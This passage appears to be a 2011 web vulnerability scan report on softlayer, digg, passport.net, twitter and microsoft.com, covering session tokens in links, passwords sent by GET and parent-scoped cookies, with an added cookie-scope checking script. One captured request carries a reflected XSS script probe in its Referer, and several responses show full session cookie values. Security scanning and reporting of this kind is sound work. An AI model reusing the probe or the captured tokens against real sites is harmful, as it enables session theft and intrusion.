User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:43 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<li><a id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;byhref=1&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&amp;referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;" class="red linkN">sales chat</a>
...[SNIP]...

7.2. https://manage.softlayer.com/Sales/orderComputingInstance

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://manage.softlayer.com
Path:   /Sales/orderComputingInstance

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /Sales/orderComputingInstance HTTP/1.1
Host: manage.softlayer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1306442258.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-1683070318-1308913155755; _mkto_trk=id:220-ESA-932&token:_mch-softlayer.com-1306437485169-98953; __utma=1.1168266774.1306437626.1306442258.1308913135.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:14:55 GMT
Server: Apache
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<li><a id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;byhref=1&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&amp;referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;" class="red linkN">sales chat</a>
...[SNIP]...

7.3. https://manage.softlayer.com/index/index

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://manage.softlayer.com
Path:   /index/index

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /index/index HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:45 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<li><a id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;byhref=1&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&amp;referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;" class="red linkN">sales chat</a>
...[SNIP]...

8. Password field submitted using GET method
There are 7 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


8.1. http://digg.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method: The form contains the following password field:

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=be4697b47d58b1200ef3f6956c8cc49e2813419339d6fd7bb526092b66b1dc13; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=237528 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101255

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.2. http://digg.com/login

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method: The form contains the following password field:

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.3. http://digg.com/register

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method: The form contains the following password field:

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.4. http://digg.com/search

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method: The form contains the following password field:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27180 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, pol
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.5. http://digg.com/submit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method: The form contains the following password field:

Request

GET /submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24761 10.2.128.235
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8620

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.6. http://digg.com/topic

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /topic

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method: The form contains the following password field:

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31422 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.7. http://digg.com/upcoming

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method: The form contains the following password field:

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=d49aeb50a0490b4b7e1f800682c23d942b50abde233eda6a7b26c684f1cf95d6; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=300792 10.2.129.80
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98962

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- Upcoming News Headlines, Videos and Images
</title>

<meta
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

9. Cookie scoped to parent domain
There are 44 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

Under RFC 6265, a Set-Cookie header with no Domain attribute creates a host-only cookie: browsers send it only to the exact host that issued it, not to its subdomains and not to the parent domain. (Older versions of Internet Explorer sent host-only cookies to subdomains as well, which is the behaviour the original scanner text described.) Adding Domain=example.com, with or without a leading dot (RFC 6265 ignores the dot), widens the scope to example.com and every host beneath it. Omitting the attribute is therefore the safe default and is appropriate in most situations; a session cookie in particular should be host-only unless another host genuinely needs it. If you do need a cookie to be shared across a parent domain, thoroughly review the security of every application on that domain and its subdomains, and confirm that you are willing to trust the people and systems that support them. Mark session cookies HttpOnly (and Secure on HTTPS sites) so that script on a sibling host cannot read them; note that HttpOnly does not stop a compromised sibling host from receiving the cookie in requests.
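The following Python script is an added example, not part of the original scan report and not a tool from the report's author. It applies the RFC 6265 rules described above to Set-Cookie headers: it tells host-only cookies from Domain-scoped ones, ignores the leading dot, rejects a Domain that does not cover the issuing host or that is a bare public suffix, flags cookies scoped to a parent of the issuing host, and rewrites a header in the host-only form the remediation recommends. The sample headers are copied from the responses captured later in this section with their long values shortened; PUBLIC_SUFFIXES is a tiny constructed stand-in for the real Public Suffix List, and the hardening rule (drop Domain, add HttpOnly, add Secure over HTTPS) is this example's choice, not something the report prescribes.

```python
"""Classify Set-Cookie headers by scope using RFC 6265 domain rules.

Added example, not part of the original report. PUBLIC_SUFFIXES is a
constructed stand-in for the Public Suffix List; the SAMPLES headers are
copied from responses captured above with long values shortened.
"""
from dataclasses import dataclass

# Stand-in for the Public Suffix List: browsers refuse cookies whose Domain is a public suffix.
PUBLIC_SUFFIXES = {"com", "net", "org", "co.uk"}


@dataclass
class CookieScope:
    name: str
    effective_domain: str   # host(s) the browser will send the cookie to
    host_only: bool         # True when no Domain attribute was given
    accepted: bool          # False when a browser would reject the Set-Cookie entirely
    parent_scoped: bool     # True when Domain names a parent of the issuing host
    http_only: bool
    secure: bool


def parse_set_cookie(header: str):
    """Split a Set-Cookie header into (name, value, attributes); attribute names are lower-cased."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def domain_matches(host: str, domain: str) -> bool:
    """RFC 6265 section 5.1.3: host matches domain if equal, or host ends with '.' + domain."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def assess(issuing_host: str, header: str) -> CookieScope:
    """Work out how a browser scopes one cookie issued by issuing_host."""
    name, _, attrs = parse_set_cookie(header)
    http_only, secure = "httponly" in attrs, "secure" in attrs
    # RFC 6265 section 5.2.3: a leading dot in the Domain attribute is ignored.
    domain = attrs.get("domain", "").lower().lstrip(".")
    host = issuing_host.lower()
    if not domain:
        # No Domain attribute: host-only cookie, sent only to the exact issuing host.
        return CookieScope(name, host, True, True, False, http_only, secure)
    # A Domain that does not cover the issuing host, or that is a public suffix, is rejected.
    accepted = domain_matches(host, domain) and domain not in PUBLIC_SUFFIXES
    parent_scoped = accepted and domain != host
    return CookieScope(name, domain, False, accepted, parent_scoped, http_only, secure)


def harden(header: str, https: bool) -> str:
    """Rewrite a Set-Cookie header as host-only with HttpOnly (and Secure when served over HTTPS)."""
    name, value, attrs = parse_set_cookie(header)
    out = [f"{name}={value}"]
    for key, val in attrs.items():
        if key in ("domain", "httponly", "secure"):
            continue            # Domain is dropped; the two flags are re-added below
        out.append(f"{key}={val}" if val else key)
    if https:
        out.append("Secure")
    out.append("HttpOnly")
    return "; ".join(out)


def findings(issuing_host: str, headers):
    """Return (cookie name, note) pairs for every parent-scoped cookie in a response."""
    result = []
    for header in headers:
        scope = assess(issuing_host, header)
        if scope.parent_scoped:
            note = f"sent to every host under {scope.effective_domain}"
            if not scope.http_only:
                note += "; readable by script on those hosts too (no HttpOnly)"
            result.append((scope.name, note))
    return result


# Headers copied from the responses captured above (long values shortened).
SAMPLES = {
    "accountservices.passport.net": [
        "HIPSession=45S*6vuIWEDZ...; domain=.passport.net;path=/;version=1",
    ],
    "api.twitter.com": [
        "auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT",
        "_twitter_sess=BAh7CjoPY3Jl...; domain=.twitter.com; path=/; HttpOnly",
    ],
    "adx.adnxs.com": [
        "sess=1; path=/; expires=Thu, 07-Jul-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly",
    ],
}

if __name__ == "__main__":
    for host, headers in SAMPLES.items():
        https = host == "accountservices.passport.net"   # only that response above was served over HTTPS
        for name, note in findings(host, headers):
            print(f"{host}: {name} is {note}")
        for header in headers:
            print("  hardened:", harden(header, https=https))
```

Run against the samples, the script reports HIPSession (passport.net, no HttpOnly), _twitter_sess (twitter.com) and sess (adnxs.com) as parent-scoped, and leaves the host-only auth_token deletion alone. The public-suffix check matters in practice: a Domain=net or Domain=co.uk cookie is silently dropped by browsers, so a scanner that only compares suffixes would report a cookie that never exists.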


9.1. https://accountservices.passport.net/gethip.srf

Summary

Severity:   Low
Confidence:   Firm
Host:   https://accountservices.passport.net
Path:   /gethip.srf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: HIPSession, set with domain=.passport.net in the response below. The cookie appears to contain a session token, which increases the risk associated with this issue, and it carries neither the HttpOnly nor the Secure flag even though it is issued over HTTPS. You should review the contents of the cookie to determine its function.

Request

GET /gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CkTst=G1309951137024

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19932
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:14 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1
PPServer: PPV: 30 H: BAYIDSPROF1D05 V: 0
Date: Wed, 06 Jul 2011 11:21:13 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...

9.2. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: _twitter_sess, set with domain=.twitter.com in the response below (the auth_token header in the same response has no Domain attribute and only clears a host-only cookie). The cookie appears to contain a session token, which increases the risk associated with this issue; it is marked HttpOnly, which keeps script on sibling hosts from reading it but does not stop those hosts from receiving it. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?since_id=68453667229020161&include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=15163484 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
X-Twitter-Polling: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1309445969207029; __utma=43838368.1598605414.1305368954.1308923300.1309960866.11; __utmb=43838368.1.10.1309960866; __utmc=43838368; __utmz=43838368.1309960866.11.4.utmcsr=techflash.com|utmccn=(referral)|utmcmd=referral|utmcct=/about.html; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; guest_id=v1%3A130884465537011414; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCAzhKP8wAToOcmV0dXJuX3RvIiBodHRwOi8v%250AdHdpdHRlci5jb20vZ3JlZ2xhbW06B2lkIiVkNDQ5NTQwNjk5YTQ4ZDU0NjNl%250AZjhmNDNiYWM3MjQyNToMY3NyZl9pZCIlM2UwN2EzMmM4Zjk4ZGJjYjE0ZTM0%250AYTQ1YzQzMmQzYTUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--f3d4f811a37ea07fd8b37060d2e6643dd71eac68

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309961052-4529-6887
X-RateLimit-Limit: 1000
ETag: "9c237181185d2b078bf4fda3390239f0"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 14:04:12 GMT
X-RateLimit-Remaining: 994
X-Runtime: 0.01930
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114aff9ed0a
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 239a05ec8562be929883e9ec9c5449f8d4242a71
X-RateLimit-Reset: 1309964469
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCAzhKP8wAToOcmV0dXJuX3RvIiBodHRwOi8v%250AdHdpdHRlci5jb20vZ3JlZ2xhbW06DGNzcmZfaWQiJTNlMDdhMzJjOGY5OGRi%250AY2IxNGUzNGE0NWM0MzJkM2E1OgdpZCIlZDQ0OTU0MDY5OWE0OGQ1NDYzZWY4%250AZjQzYmFjNzI0MjUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--25bb772d1d71a9f9c11b1038f0fad6e3f4958060; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 4534
Connection: close

{"statuses":[],"packed_response_type":"statuses","available_features":{"tweet_stream_retweets_by_others":1,"dashboard_activity_listed":1,"phoenix_tweetbox_talon":1,"tweet_stream_favorites_polling":1,"
...[SNIP]...

9.3. http://c.microsoft.com/trans_pixel.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: MICROSOFTSESSIONCOOKIE and MSID (domain=microsoft.com) and MS0 (domain=.microsoft.com); under RFC 6265 the leading dot makes no difference, so all three cover every host under microsoft.com. One of them appears to contain a session token (MICROSOFTSESSIONCOOKIE carries a SessionCookie.Id value), which increases the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&ti=Microsoft%20Search%20Preferences%20Page&fi=1&fv=10.3&r=http%3A%2F%2Fburp%2Fshow%2F0&ts=1309951354314&sr=1920x1200&bs=1041x985 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://search.microsoft.com/Preference.aspx?bd498%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ef1d3c6b4585=1&mkt=en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; mcI=Thu, 09 Jun 2011 16:24:17 GMT; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; s_vnum=1311213700142%26vn%3D2; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/21/2011 12:35:21&Microsoft.VisitStartDate=06/21/2011 12:32:03&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=29&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940116672:ss=1309940093261

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7fac793-ceeb-435f-829d-6351edfd89a3&Microsoft.CreationDate=07/06/2011 11:22:37&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.NumberOfVisits=2&SessionCookie.Id=26FDF2F789E3D4343E8A3F6065EE6BF1; domain=microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.VisitStartDate=07/06/2011 11:22:37&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=31&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Thu, 05-Jul-2012 11:22:38 GMT; path=/
Set-Cookie: MS0=3382a99b723844019751e1a79738c963; domain=.microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:22:38 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

9.4. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

